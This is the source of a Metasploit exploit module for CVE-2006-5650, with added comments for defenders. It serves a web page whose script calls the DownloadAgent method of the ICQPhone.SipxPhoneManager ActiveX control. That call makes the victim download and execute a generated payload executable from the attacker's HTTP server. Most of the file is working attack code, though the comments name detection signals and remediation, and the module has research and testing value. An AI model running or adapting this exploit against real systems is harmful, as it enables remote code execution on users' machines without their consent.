Path: blob/master/modules/exploits/windows/browser/aol_icq_downloadagent.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-delivered module for CVE-2006-5650 (ZDI 06-037): the
# ICQPhone.SipxPhoneManager ActiveX control exposes a DownloadAgent method
# that, per the module description, downloads and executes a file from a
# caller-supplied URL.
#
# Notes for defenders, derived from the code below:
# * The served page is a short HTML document whose script instantiates the
#   ProgID 'ICQPhone.SipxPhoneManager.1' and calls DownloadAgent with an
#   http:// URL. No shellcode or memory-corruption primitive is involved, so
#   content inspection should key on the ProgID and method name rather than on
#   the variable name, which is randomised per request.
# * The URL handed to DownloadAgent has the shape
#   <resource>/PAYLOAD/<1-5 uppercase letters>.exe and the follow-up request is
#   answered with Content-Type application/octet-stream. An executable fetched
#   by the ICQ component right after a page load is a useful proxy/EDR signal.
# * NOTE(review): remediation is outside this file; updating or removing the
#   affected ICQ component, or preventing the control from loading in the
#   browser, are the usual options for this class of flaw. Confirm against the
#   advisories listed under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Registers module metadata (name, references, payload constraints, target)
  # and the URIPATH option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',
      'Description'    => %q{
        This module allows remote attackers to download and execute arbitrary files
        on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2006-5650' ],
          [ 'OSVDB', '30220' ],
          [ 'BID', '20930' ],
          [ 'ZDI', '06-037' ],
        ],
      'Payload'        =>
        {
          'Space'           => 2048,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => '2006-11-06',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
      ])
  end

  # Always returns false.
  # NOTE(review): presumably opts the module out of automated selection;
  # the consumer of this hook is not visible in this file.
  def autofilter
    false
  end

  # Delegates to use_zlib, which is defined outside this file.
  def check_dependencies
    use_zlib
  end

  # Handles every HTTP request that reaches the module's resource.
  #
  # Two kinds of request are distinguished by the request URI:
  # * a URI containing "PAYLOAD" is answered with the generated executable;
  # * anything else is answered with the HTML page that invokes the control.
  #
  # @param cli the connected client (peerhost is read from it)
  # @param request the parsed HTTP request (uri is read from it)
  def on_request_uri(cli, request)
    configured_host = datastore['SRVHOST']
    # A wildcard bind address cannot be placed in a URL, so the address of the
    # local interface that routes to this client is used instead.
    reachable_host =
      if configured_host == '0.0.0.0'
        Rex::Socket.source_address(cli.peerhost)
      else
        configured_host
      end
    payload_url = "http://#{reachable_host}:#{datastore['SRVPORT']}#{get_resource}/PAYLOAD"

    # Second stage: the component (not the browser page) requests the file.
    # The match is unanchored, so any URI containing the marker takes this path.
    if request.uri.match?(/PAYLOAD/)
      p = regenerate_payload(cli)
      return if p.nil?

      data = generate_payload_exe({ :code => p.encoded })
      print_status("Sending EXE payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Both names are randomised per request; only the ProgID, the method name
    # and the ".exe" suffix are stable across responses.
    var_name = rand_text_alpha(rand(100) + 1)
    exe_name = rand_text_alpha_upper(rand(5) + 1)

    content = %Q|
<html>
<head>
<script>
try {
var #{var_name} = new ActiveXObject('ICQPhone.SipxPhoneManager.1');
#{var_name}.DownloadAgent("#{payload_url}/#{exe_name}.exe");
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

    print_status("Sending exploit...")

    send_response_html(cli, content)

    handler(cli)
  end
end